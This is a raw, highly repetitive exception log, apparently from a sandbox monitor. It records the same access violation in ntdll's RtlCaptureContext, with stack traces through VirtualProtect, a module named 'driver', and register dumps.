New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040
0x58c040

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244968
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff
0x880fff

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x774b0895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1242680
registers.rsi: 5377630208
registers.r10: 0
registers.rbx: 1995976432
registers.rsp: 1244936
registers.r11: 514
registers.r8: 64
registers.r9: 4
registers.rdx: 1244024
registers.r12: 0
registers.rbp: 0
registers.rdi: 5368709487
registers.rax: 1242360
registers.r13: 0
1 0 0

__exception__

stacktrace:
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x774b0895
stacktrace+0x84 memdup-0x1af @ 0x740b0470
hook_in_monitor+0x45 lde-0x133 @ 0x740a42ea
New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x740c3603
VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefda83243
VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefda831fb
driver+0x1be7cf @ 0x1401be7cf
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
0x880fff
GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76f82ef0
driver+0x882000 @ 0x140882000
driver+0x1000 @ 0x140001000
0x58c040
0x58c040
0x58c040
